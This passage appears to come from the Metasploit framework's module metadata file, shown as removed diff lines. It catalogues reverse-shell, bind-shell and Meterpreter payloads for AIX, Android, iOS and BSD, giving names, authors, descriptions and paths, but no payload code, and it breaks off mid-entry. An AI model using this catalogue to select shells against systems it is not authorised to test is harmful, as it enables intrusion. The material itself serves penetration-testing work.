"payload_aix/ppc/shell_reverse_tcp": { - "name": "AIX Command Shell, Reverse TCP Inline", - "fullname": "payload/aix/ppc/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ramon de C Valle " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "AIX", - "arch": "ppc", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "aix/ppc/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_android/meterpreter/reverse_http": { - "name": "Android Meterpreter, Android Reverse HTTP Stager", - "fullname": "payload/android/meterpreter/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "mihi", - "egypt ", - "OJ Reeves", - "anwarelmakrahy" - ], - "description": "Run a meterpreter server in Android.\n\nTunnel communication over HTTP", - "references": [], - "platform": "Android", - "arch": "dalvik", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/android/reverse_http.rb", - "is_install_path": true, - "ref_name": "android/meterpreter/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "android/meterpreter", - "stager_refname": "android/reverse_http" - }, - "payload_android/meterpreter/reverse_https": { - "name": "Android Meterpreter, Android Reverse HTTPS Stager", - "fullname": 
"payload/android/meterpreter/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "mihi", - "egypt ", - "OJ Reeves", - "anwarelmakrahy" - ], - "description": "Run a meterpreter server in Android.\n\nTunnel communication over HTTPS", - "references": [], - "platform": "Android", - "arch": "dalvik", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/android/reverse_https.rb", - "is_install_path": true, - "ref_name": "android/meterpreter/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "android/meterpreter", - "stager_refname": "android/reverse_https" - }, - "payload_android/meterpreter/reverse_tcp": { - "name": "Android Meterpreter, Android Reverse TCP Stager", - "fullname": "payload/android/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "mihi", - "egypt ", - "OJ Reeves" - ], - "description": "Run a meterpreter server in Android.\n\nConnect back stager", - "references": [], - "platform": "Android", - "arch": "dalvik", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/android/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "android/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "android/meterpreter", - "stager_refname": "android/reverse_tcp" - }, - "payload_android/meterpreter_reverse_http": { - "name": "Android Meterpreter Shell, Reverse HTTP Inline", 
- "fullname": "payload/android/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [], - "description": "Connect back to attacker and spawn a Meterpreter shell", - "references": [], - "platform": "Android", - "arch": "dalvik", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/android/meterpreter_reverse_http.rb", - "is_install_path": true, - "ref_name": "android/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_android/meterpreter_reverse_https": { - "name": "Android Meterpreter Shell, Reverse HTTPS Inline", - "fullname": "payload/android/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [], - "description": "Connect back to attacker and spawn a Meterpreter shell", - "references": [], - "platform": "Android", - "arch": "dalvik", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/android/meterpreter_reverse_https.rb", - "is_install_path": true, - "ref_name": "android/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_android/meterpreter_reverse_tcp": { - "name": "Android Meterpreter Shell, Reverse TCP Inline", - "fullname": "payload/android/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [], - "description": "Connect back to the attacker and spawn a Meterpreter shell", - "references": 
[], - "platform": "Android", - "arch": "dalvik", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/android/meterpreter_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "android/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_android/shell/reverse_http": { - "name": "Command Shell, Android Reverse HTTP Stager", - "fullname": "payload/android/shell/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "mihi", - "egypt ", - "anwarelmakrahy", - "OJ Reeves" - ], - "description": "Spawn a piped command shell (sh).\n\nTunnel communication over HTTP", - "references": [], - "platform": "Android", - "arch": "dalvik", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/android/reverse_http.rb", - "is_install_path": true, - "ref_name": "android/shell/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "android/shell", - "stager_refname": "android/reverse_http" - }, - "payload_android/shell/reverse_https": { - "name": "Command Shell, Android Reverse HTTPS Stager", - "fullname": "payload/android/shell/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "mihi", - "egypt ", - "anwarelmakrahy", - "OJ Reeves" - ], - "description": "Spawn a piped command shell (sh).\n\nTunnel communication over HTTPS", - "references": [], - "platform": "Android", - "arch": "dalvik", - "rport": null, - 
"autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/android/reverse_https.rb", - "is_install_path": true, - "ref_name": "android/shell/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "android/shell", - "stager_refname": "android/reverse_https" - }, - "payload_android/shell/reverse_tcp": { - "name": "Command Shell, Android Reverse TCP Stager", - "fullname": "payload/android/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "mihi", - "egypt " - ], - "description": "Spawn a piped command shell (sh).\n\nConnect back stager", - "references": [], - "platform": "Android", - "arch": "dalvik", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/android/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "android/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "android/shell", - "stager_refname": "android/reverse_tcp" - }, - "payload_apple_ios/aarch64/meterpreter_reverse_http": { - "name": "Apple_iOS Meterpreter, Reverse HTTP Inline", - "fullname": "payload/apple_ios/aarch64/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Apple_iOS", - "arch": "aarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": 
null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb", - "is_install_path": true, - "ref_name": "apple_ios/aarch64/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_apple_ios/aarch64/meterpreter_reverse_https": { - "name": "Apple_iOS Meterpreter, Reverse HTTPS Inline", - "fullname": "payload/apple_ios/aarch64/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Apple_iOS", - "arch": "aarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb", - "is_install_path": true, - "ref_name": "apple_ios/aarch64/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_apple_ios/aarch64/meterpreter_reverse_tcp": { - "name": "Apple_iOS Meterpreter, Reverse TCP Inline", - "fullname": "payload/apple_ios/aarch64/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Apple_iOS", - "arch": "aarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - 
"path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "apple_ios/aarch64/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_apple_ios/aarch64/shell_reverse_tcp": { - "name": "Apple iOS aarch64 Command Shell, Reverse TCP Inline", - "fullname": "payload/apple_ios/aarch64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "Apple_iOS", - "arch": "aarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/apple_ios/aarch64/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "apple_ios/aarch64/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_apple_ios/armle/meterpreter_reverse_http": { - "name": "Apple_iOS Meterpreter, Reverse HTTP Inline", - "fullname": "payload/apple_ios/armle/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Apple_iOS", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_http.rb", - "is_install_path": true, - "ref_name": 
"apple_ios/armle/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_apple_ios/armle/meterpreter_reverse_https": { - "name": "Apple_iOS Meterpreter, Reverse HTTPS Inline", - "fullname": "payload/apple_ios/armle/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Apple_iOS", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_https.rb", - "is_install_path": true, - "ref_name": "apple_ios/armle/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_apple_ios/armle/meterpreter_reverse_tcp": { - "name": "Apple_iOS Meterpreter, Reverse TCP Inline", - "fullname": "payload/apple_ios/armle/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Apple_iOS", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "apple_ios/armle/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - 
"default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsd/sparc/shell_bind_tcp": { - "name": "BSD Command Shell, Bind TCP Inline", - "fullname": "payload/bsd/sparc/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 " - ], - "description": "Listen for a connection and spawn a command shell", - "references": [], - "platform": "BSD", - "arch": "sparc", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "bsd/sparc/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsd/sparc/shell_reverse_tcp": { - "name": "BSD Command Shell, Reverse TCP Inline", - "fullname": "payload/bsd/sparc/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "BSD", - "arch": "sparc", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "bsd/sparc/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsd/vax/shell_reverse_tcp": { - "name": "BSD Command Shell, Reverse TCP Inline", - "fullname": "payload/bsd/vax/shell_reverse_tcp", - "aliases": [], - "rank": 
300, - "disclosure_date": null, - "type": "payload", - "author": [ - "wvu " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "BSD", - "arch": "vax", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsd/vax/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "bsd/vax/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsd/x64/exec": { - "name": "BSD x64 Execute Command", - "fullname": "payload/bsd/x64/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "joev " - ], - "description": "Execute an arbitrary command", - "references": [], - "platform": "BSD", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsd/x64/exec.rb", - "is_install_path": true, - "ref_name": "bsd/x64/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsd/x64/shell_bind_ipv6_tcp": { - "name": "BSD x64 Command Shell, Bind TCP Inline (IPv6)", - "fullname": "payload/bsd/x64/shell_bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Balazs Bucsay @xoreipeip " - ], - "description": "Listen for a connection and spawn a command shell over IPv6", - "references": [ - "URL-https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_ipv6_bind_tcp.asm.c" - ], - "platform": "BSD", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - 
"autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "bsd/x64/shell_bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsd/x64/shell_bind_tcp": { - "name": "BSD x64 Shell Bind TCP", - "fullname": "payload/bsd/x64/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "nemo ", - "joev " - ], - "description": "Bind an arbitrary command to an arbitrary port", - "references": [], - "platform": "BSD", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsd/x64/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "bsd/x64/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsd/x64/shell_bind_tcp_small": { - "name": "BSD x64 Command Shell, Bind TCP Inline", - "fullname": "payload/bsd/x64/shell_bind_tcp_small", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Balazs Bucsay @xoreipeip " - ], - "description": "Listen for a connection and spawn a command shell", - "references": [ - "URL-https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_bind_tcp.asm.c" - ], - "platform": "BSD", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb", - "is_install_path": true, - "ref_name": 
"bsd/x64/shell_bind_tcp_small", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsd/x64/shell_reverse_ipv6_tcp": { - "name": "BSD x64 Command Shell, Reverse TCP Inline (IPv6)", - "fullname": "payload/bsd/x64/shell_reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Balazs Bucsay @xoreipeip " - ], - "description": "Connect back to attacker and spawn a command shell over IPv6", - "references": [ - "URL-https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_ipv6_reverse_tcp.asm.c" - ], - "platform": "BSD", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "bsd/x64/shell_reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsd/x64/shell_reverse_tcp": { - "name": "BSD x64 Shell Reverse TCP", - "fullname": "payload/bsd/x64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "nemo ", - "joev " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "BSD", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsd/x64/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "bsd/x64/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": 
false, - "payload_type": 1, - "staged": false - }, - "payload_bsd/x64/shell_reverse_tcp_small": { - "name": "BSD x64 Command Shell, Reverse TCP Inline", - "fullname": "payload/bsd/x64/shell_reverse_tcp_small", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Balazs Bucsay @xoreipeip " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [ - "URL-https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_reverse_tcp.asm.c" - ], - "platform": "BSD", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb", - "is_install_path": true, - "ref_name": "bsd/x64/shell_reverse_tcp_small", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsd/x86/exec": { - "name": "BSD Execute Command", - "fullname": "payload/bsd/x86/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "snagg ", - "argp ", - "joev " - ], - "description": "Execute an arbitrary command", - "references": [], - "platform": "BSD", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsd/x86/exec.rb", - "is_install_path": true, - "ref_name": "bsd/x86/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsd/x86/metsvc_bind_tcp": { - "name": "FreeBSD Meterpreter Service, Bind TCP", - "fullname": "payload/bsd/x86/metsvc_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, 
- "type": "payload", - "author": [ - "hdm " - ], - "description": "Stub payload for interacting with a Meterpreter Service", - "references": [], - "platform": "BSD", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsd/x86/metsvc_bind_tcp.rb", - "is_install_path": true, - "ref_name": "bsd/x86/metsvc_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsd/x86/metsvc_reverse_tcp": { - "name": "FreeBSD Meterpreter Service, Reverse TCP Inline", - "fullname": "payload/bsd/x86/metsvc_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Stub payload for interacting with a Meterpreter Service", - "references": [], - "platform": "BSD", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "bsd/x86/metsvc_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsd/x86/shell/bind_ipv6_tcp": { - "name": "BSD Command Shell, Bind TCP Stager (IPv6)", - "fullname": "payload/bsd/x86/shell/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "vlad902 ", - "hdm " - ], - "description": "Spawn a command shell (staged).\n\nListen for a connection over IPv6", - "references": [], - "platform": "BSD", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": 
null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "bsd/x86/shell/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "bsd/x86/shell", - "stager_refname": "bsd/x86/bind_ipv6_tcp" - }, - "payload_bsd/x86/shell/bind_tcp": { - "name": "BSD Command Shell, Bind TCP Stager", - "fullname": "payload/bsd/x86/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape " - ], - "description": "Spawn a command shell (staged).\n\nListen for a connection", - "references": [], - "platform": "BSD", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/bsd/x86/bind_tcp.rb", - "is_install_path": true, - "ref_name": "bsd/x86/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "bsd/x86/shell", - "stager_refname": "bsd/x86/bind_tcp" - }, - "payload_bsd/x86/shell/find_tag": { - "name": "BSD Command Shell, Find Tag Stager", - "fullname": "payload/bsd/x86/shell/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape " - ], - "description": "Spawn a command shell (staged).\n\nUse an established connection", - "references": [], - "platform": "BSD", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/bsd/x86/find_tag.rb", - "is_install_path": true, - "ref_name": 
"bsd/x86/shell/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "bsd/x86/shell", - "stager_refname": "bsd/x86/find_tag" - }, - "payload_bsd/x86/shell/reverse_ipv6_tcp": { - "name": "BSD Command Shell, Reverse TCP Stager (IPv6)", - "fullname": "payload/bsd/x86/shell/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "vlad902 ", - "hdm " - ], - "description": "Spawn a command shell (staged).\n\nConnect back to the attacker over IPv6", - "references": [], - "platform": "BSD", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "bsd/x86/shell/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "bsd/x86/shell", - "stager_refname": "bsd/x86/reverse_ipv6_tcp" - }, - "payload_bsd/x86/shell/reverse_tcp": { - "name": "BSD Command Shell, Reverse TCP Stager", - "fullname": "payload/bsd/x86/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape " - ], - "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "BSD", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/bsd/x86/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "bsd/x86/shell/reverse_tcp", - "check": false, - "post_auth": false, - 
"default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "bsd/x86/shell", - "stager_refname": "bsd/x86/reverse_tcp" - }, - "payload_bsd/x86/shell_bind_tcp": { - "name": "BSD Command Shell, Bind TCP Inline", - "fullname": "payload/bsd/x86/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ramon de C Valle " - ], - "description": "Listen for a connection and spawn a command shell", - "references": [], - "platform": "BSD", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "bsd/x86/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsd/x86/shell_bind_tcp_ipv6": { - "name": "BSD Command Shell, Bind TCP Inline 